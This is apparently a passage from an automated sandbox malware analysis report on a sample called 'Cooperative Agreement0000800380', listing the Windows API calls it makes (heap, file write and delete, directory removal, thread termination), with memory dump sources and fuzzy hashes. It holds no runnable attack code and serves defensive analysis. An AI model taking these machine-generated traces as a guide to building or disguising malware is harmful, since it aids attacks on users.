                                                                                                                                                                                                                                          • Part of subcall function 0040D498: LeaveCriticalSection.KERNEL32(00000020,?,00000000,0040ADD5,00000000,?,?,00000000,004033A4,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0040D51E
                                                                                                                                                                                                                                        • CreateFileW.KERNELBASE(00000000,80000000,00000000,00000000,00000003,00000080,00000000,?,00000000,?,?,00000000,004033A4,00000000,00000000,00000000), ref: 0040ADF3
                                                                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000,00001000,?,00000000,?,?,00000000,004033A4,00000000,00000000,00000000,00000000,?,00000000,00000000,00000800), ref: 0040AE15
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CriticalSection$AllocCreateEnterFileHeapLeave
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3705299215-0
                                                                                                                                                                                                                                        • Opcode ID: e305dac00e43d1f01632c500e63f0068ba79cd60e0177f680cb6723e5d67acda
                                                                                                                                                                                                                                        • Instruction ID: 12139a0eb1477c71ece9156acb4b07c5ee84e209973367f4cf7a68f803bf58ce
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e305dac00e43d1f01632c500e63f0068ba79cd60e0177f680cb6723e5d67acda
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C1119331140300ABC2305F1AEC44B57BBF9EB85764F14863EF5A5A73E0C7759C158BA9

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 806 40dbca-40dbe1 call 40dd1d 809 40dbe7-40dc04 RtlAllocateHeap 806->809 810 40dc69-40dc6e 806->810 811 40dc06-40dc4c memset call 411a64 809->811 812 40dc68 809->812 811->812 815 40dc4e-40dc50 811->815 812->810 815->812 816 40dc52-40dc54 815->816 817 40dc58-40dc62 call 411e8f 816->817 820 40dc64 817->820 820->812
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 0040DD1D: HeapFree.KERNEL32(00000000,-00000018,00000200,00000000,0040DBDB,00000200,?,?,?,0040112D,0000000C,000186A1,00000007,00417080,00418098,00000004), ref: 0040DD5E
                                                                                                                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,FFFFFFDD,?,00000200,?,?,?,0040112D,0000000C,000186A1,00000007,00417080,00418098,00000004,00000000,00417070), ref: 0040DBFA
                                                                                                                                                                                                                                        • memset.MSVCRT ref: 0040DC35
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Heap$AllocateFreememset
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2774703448-0
                                                                                                                                                                                                                                        • Opcode ID: 5a98dcc60eb41190d4dd3f8e51887e861c9e07386c3483abd70395c86239bf10
                                                                                                                                                                                                                                        • Instruction ID: c1bdd2e89517895a38d7a8cc2bcc280f97e8981c2924b00dcd90f9207400bfe8
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5a98dcc60eb41190d4dd3f8e51887e861c9e07386c3483abd70395c86239bf10
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E51167729043149BC320DF59DC80A8BBBE8EF88B10F01492EB988A7351D774E804CBA5
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 0040DFC0: TlsGetValue.KERNEL32(0000000D,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000,00000000,00000004,00000000,00417070,00000008,0000000C), ref: 0040DFD7
                                                                                                                                                                                                                                        • RemoveDirectoryW.KERNEL32(00000000,-0000012C,004023BA,00000000,?,00000000,00000001,00000000,00000000,00000000,00000002,00000000,00000000,00417024,00000001,00000000), ref: 00402000
                                                                                                                                                                                                                                        • RemoveDirectoryW.KERNEL32(00000000,-0000012C,004023BA,00000000,?,00000000,00000001,00000000,00000000,00000000,00000002,00000000,00000000,00417024,00000001,00000000), ref: 0040200B
                                                                                                                                                                                                                                          • Part of subcall function 004053C7: WaitForSingleObject.KERNEL32(00000000,00000000,00000000,00401FC5,00000000,-0000012C,004023BA,00000000,?,00000000,00000001,00000000,00000000,00000000,00000002,00000000), ref: 004053D7
                                                                                                                                                                                                                                          • Part of subcall function 00405436: TerminateThread.KERNEL32(00000000,00000000,00000000,?,?,-0000012C,00401FD4,00000000,-0000012C,004023BA,00000000,?,00000000,00000001,00000000,00000000), ref: 00405446
                                                                                                                                                                                                                                          • Part of subcall function 00405436: EnterCriticalSection.KERNEL32(004186A8,?,?,-0000012C,00401FD4,00000000,-0000012C,004023BA,00000000,?,00000000,00000001,00000000,00000000,00000000,00000002), ref: 00405452
                                                                                                                                                                                                                                          • Part of subcall function 00405436: LeaveCriticalSection.KERNEL32(004186A8,?,?,-0000012C,00401FD4,00000000,-0000012C,004023BA,00000000,?,00000000,00000001,00000000,00000000,00000000,00000002), ref: 00405486
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CriticalDirectoryRemoveSection$EnterLeaveObjectSingleTerminateThreadValueWait
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1205394408-0
                                                                                                                                                                                                                                        • Opcode ID: cbf9c02a299cce853fa8afa1118c476f8ea06bf817103c663cdc69cc5dfa62d5
                                                                                                                                                                                                                                        • Instruction ID: f8114c552bbb016f0a76c43bd4124e9f0fb198a1ce0b642fe03d48e839951556
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cbf9c02a299cce853fa8afa1118c476f8ea06bf817103c663cdc69cc5dfa62d5
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 36F0C030414505AADA257B32EC8299A7E36EB08308B42C43FF440714F2CF3E9D69AE5D
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • HeapCreate.KERNELBASE(00000000,00001000,00000000,?,00401053,00000000,00001000,00000000,00000000), ref: 0040DE3C
                                                                                                                                                                                                                                        • TlsAlloc.KERNEL32(?,00401053,00000000,00001000,00000000,00000000), ref: 0040DE47
                                                                                                                                                                                                                                          • Part of subcall function 0040E6A0: HeapAlloc.KERNEL32(02390000,00000000,0000000C,?,?,0040DE57,?,00401053,00000000,00001000,00000000,00000000), ref: 0040E6AE
                                                                                                                                                                                                                                          • Part of subcall function 0040E6A0: HeapAlloc.KERNEL32(02390000,00000000,00000010,?,?,0040DE57,?,00401053,00000000,00001000,00000000,00000000), ref: 0040E6C2
                                                                                                                                                                                                                                          • Part of subcall function 0040E6A0: TlsSetValue.KERNEL32(0000000D,00000000,?,?,0040DE57,?,00401053,00000000,00001000,00000000,00000000), ref: 0040E6EB
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AllocHeap$CreateValue
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 493873155-0
                                                                                                                                                                                                                                        • Opcode ID: f31918e335419563cb91e7816fe34751be6fcb3fb2708b1ef5dadcb8cb13decf
                                                                                                                                                                                                                                        • Instruction ID: f6fb69b35e6ce2edff263c55ffd8902d3e18a9f91630c6f11d167ca4d15ccc07
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f31918e335419563cb91e7816fe34751be6fcb3fb2708b1ef5dadcb8cb13decf
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4ED012309C8304ABE7402FB1BC0A7843B789708765F604835F509572D1D9BA6090495C
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • SetFileAttributesW.KERNEL32(00000002,00000080,0040A7F2,02399740,00000000,00401FDF,00000000,-0000012C,004023BA,00000000,?,00000000,00000001,00000000,00000000,00000000), ref: 0040A7D0
                                                                                                                                                                                                                                        • DeleteFileW.KERNELBASE(00000000,0040A7F2,02399740,00000000,00401FDF,00000000,-0000012C,004023BA,00000000,?,00000000,00000001,00000000,00000000,00000000,00000002), ref: 0040A7DA
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: File$AttributesDelete
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2910425767-0
                                                                                                                                                                                                                                        • Opcode ID: d362f7088f03a7c0c281f2bbae1f9f88548ac7f83f4d98d140da13098a0d0c91
                                                                                                                                                                                                                                        • Instruction ID: f7dd43ce8ab679ab9acf2fbd66ade7664d9bbbd5be98dbe0a51a073a4b2bc51f
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d362f7088f03a7c0c281f2bbae1f9f88548ac7f83f4d98d140da13098a0d0c91
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 00D09E30408300B6D7555B20C90D75ABAF17F84745F14C43AF485514F1D7798C65E70A
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • HeapDestroy.KERNELBASE(02390000,?,004011AF,00000000,00418048,00000000,00000000,00000004,00000000,00417070,00000008,0000000C,000186A1,00000007,00417080,00418098), ref: 0040DE69
                                                                                                                                                                                                                                        • TlsFree.KERNELBASE(0000000D,?,004011AF,00000000,00418048,00000000,00000000,00000004,00000000,00417070,00000008,0000000C,000186A1,00000007,00417080,00418098), ref: 0040DE76
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: DestroyFreeHeap
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3293292866-0
                                                                                                                                                                                                                                        • Opcode ID: e1e86a498c82862297bb4ba2eeef0c9791047cff053e7cc11c8159107c07dceb
                                                                                                                                                                                                                                        • Instruction ID: 39e23e6c0b6f630abd0a78494d594864f6bb0b6a3747c7bb50b876903a384421
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e1e86a498c82862297bb4ba2eeef0c9791047cff053e7cc11c8159107c07dceb
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 94C04C71158304ABCB049BA5FC488D57BBDE74C6153408564F51983661CA36E4408B58
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • HeapFree.KERNEL32(00000000,?,00000000,00000000,?,?,004033E8,00000000,00000000,00000800,00000000,00000000,00000000,00000000,?,00000000), ref: 0040AA13
                                                                                                                                                                                                                                        • CloseHandle.KERNELBASE(00000000,00000000,?,?,004033E8,00000000,00000000,00000800,00000000,00000000,00000000,00000000,?,00000000,00000000,00000800), ref: 0040AA1B
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CloseFreeHandleHeap
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1642312469-0
                                                                                                                                                                                                                                        • Opcode ID: 579ea7bb730054d1301fd9c1686cb7efab9d423d292c410d1af4f5f5553bf1d6
                                                                                                                                                                                                                                        • Instruction ID: 9ff7f62518d4b0577bac71a3516b051fbd3d19e36237879e48dc57cbe5217eec
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 579ea7bb730054d1301fd9c1686cb7efab9d423d292c410d1af4f5f5553bf1d6
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E0F05E32600200A7CA216B5AED05A8BBBB2EB85764B11853EF124314F5CB355860DB5D
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 0040DFC0: TlsGetValue.KERNEL32(0000000D,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000,00000000,00000004,00000000,00417070,00000008,0000000C), ref: 0040DFD7
                                                                                                                                                                                                                                          • Part of subcall function 00409BA0: RtlAllocateHeap.NTDLL(00000008,00000000,00402F00,00000200,00000000,0000000A,00000000,00000000,00000000,00000000,00000000,00000000,0040439A,00000000,00000000,00000000), ref: 00409BB1
                                                                                                                                                                                                                                        • GetShortPathNameW.KERNEL32(02399740,02399740,00002710), ref: 00402C34
                                                                                                                                                                                                                                          • Part of subcall function 0040DE80: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040DE86
                                                                                                                                                                                                                                          • Part of subcall function 0040DE80: TlsGetValue.KERNEL32(0000000D), ref: 0040DE95
                                                                                                                                                                                                                                          • Part of subcall function 0040DE80: SetLastError.KERNEL32(?), ref: 0040DEAB
                                                                                                                                                                                                                                          • Part of subcall function 0040DEC0: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040DECC
                                                                                                                                                                                                                                          • Part of subcall function 0040DEC0: RtlAllocateHeap.NTDLL(02390000,00000000,?), ref: 0040DEF9
                                                                                                                                                                                                                                          • Part of subcall function 00409B80: HeapFree.KERNEL32(00000000,00000000,00401B6B,00000000,00000000,?,00000000,00000000,00417024,00000000,00000000,?,00000000,?,00000000,00000000), ref: 00409B8C
                                                                                                                                                                                                                                          • Part of subcall function 0040E020: wcslen.MSVCRT ref: 0040E037
                                                                                                                                                                                                                                          • Part of subcall function 00405170: TlsGetValue.KERNEL32(?,?,00402FED,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000), ref: 00405178
                                                                                                                                                                                                                                          • Part of subcall function 0040DF50: HeapFree.KERNEL32(02390000,00000000,00000000,?,00000000,?,00411DE4,00000000,00000000,-00000008), ref: 0040DF68
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: HeapValue$AllocateErrorFreeLast$NamePathShortwcslen
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 192546213-0
                                                                                                                                                                                                                                        • Opcode ID: 1518335539abc649e2e9bd3b93edd1db4bfbadc64f7801d47678a29de43b85a9
                                                                                                                                                                                                                                        • Instruction ID: 7a2999830b1481a9d7ef80217fec4737815e267699ad494388d5f61b71452053
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1518335539abc649e2e9bd3b93edd1db4bfbadc64f7801d47678a29de43b85a9
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F6012D75508201BAE5007BA1DD06D3F76A9EFD0718F10CD3EB944B50E2CA3D9C599A5E
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • WriteFile.KERNELBASE(00000000,?,?,00000000,00000000,00000000,?,0040AA08,00000000,00000000,?,?,004033E8,00000000,00000000,00000800), ref: 0040AA67
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: FileWrite
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3934441357-0
                                                                                                                                                                                                                                        • Opcode ID: da5ca93210413f8561433c219da2a3ea233fc89f057aa1d005b42788aa018882
                                                                                                                                                                                                                                        • Instruction ID: b59f1f917ceac4f5cea587e7357412edb8aff685aadda2d04846933fd6210d73
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: da5ca93210413f8561433c219da2a3ea233fc89f057aa1d005b42788aa018882
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0AF09276105700AFD720DF58D948F97BBE8EB58721F10C82EE69AD3690C770E850DB61
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetNativeSystemInfo.KERNEL32(00000000,?,00000000,00000000), ref: 00402BDD
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: InfoNativeSystem
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1721193555-0
                                                                                                                                                                                                                                        • Opcode ID: f8bc963d6c34cd4fcee6a9003d89fae8e3dd4710dd3c612eeb78866044324f60
                                                                                                                                                                                                                                        • Instruction ID: e96e1892c4c724b03879bd5233d00e0abab71770c233aa8573b83279bd435b66
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f8bc963d6c34cd4fcee6a9003d89fae8e3dd4710dd3c612eeb78866044324f60
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E6D0126081824986D750BE65850979BB3ECE700304F60883AD085561C1F7BCE9D99657
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • RtlAllocateHeap.NTDLL(00000008,00000000,00402F00,00000200,00000000,0000000A,00000000,00000000,00000000,00000000,00000000,00000000,0040439A,00000000,00000000,00000000), ref: 00409BB1
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AllocateHeap
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1279760036-0
                                                                                                                                                                                                                                        • Opcode ID: a9125dc5e6675f3a5c8ff565d637a643d225863b8cf5efdab1d921be1d17f71e
                                                                                                                                                                                                                                        • Instruction ID: 6d87291edcf2eeb8e990bf82b01346f6326b2aefffcea0088477b931f0527044
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a9125dc5e6675f3a5c8ff565d637a643d225863b8cf5efdab1d921be1d17f71e
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6EC04C717441007AD6509B24AE49F5776E9BB70702F00C4357545D15F5DB70EC50D768
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • TlsFree.KERNELBASE(004011D8,004011AA,00000000,00418048,00000000,00000000,00000004,00000000,00417070,00000008,0000000C,000186A1,00000007,00417080,00418098,00000004), ref: 0040D2E1
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Free
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3978063606-0
                                                                                                                                                                                                                                        • Opcode ID: afb8170c881060827f7b708402de6715e31012ce767a183e2a7e5af61eff3ca6
                                                                                                                                                                                                                                        • Instruction ID: 02f19102e46f6fc925772832a959dff7ad61b801f58b10c94ac68856fb14f403
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: afb8170c881060827f7b708402de6715e31012ce767a183e2a7e5af61eff3ca6
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 04C04C30405100DBDF268B44ED0C7D53671A784305F4484BD9002112F1CB7C459CDA5C
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • HeapCreate.KERNELBASE(00000000,00001000,00000000,0040106C,00000000,00001000,00000000,00000000), ref: 00409B49
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CreateHeap
                                                                                                                                                                                                                                        • String ID:
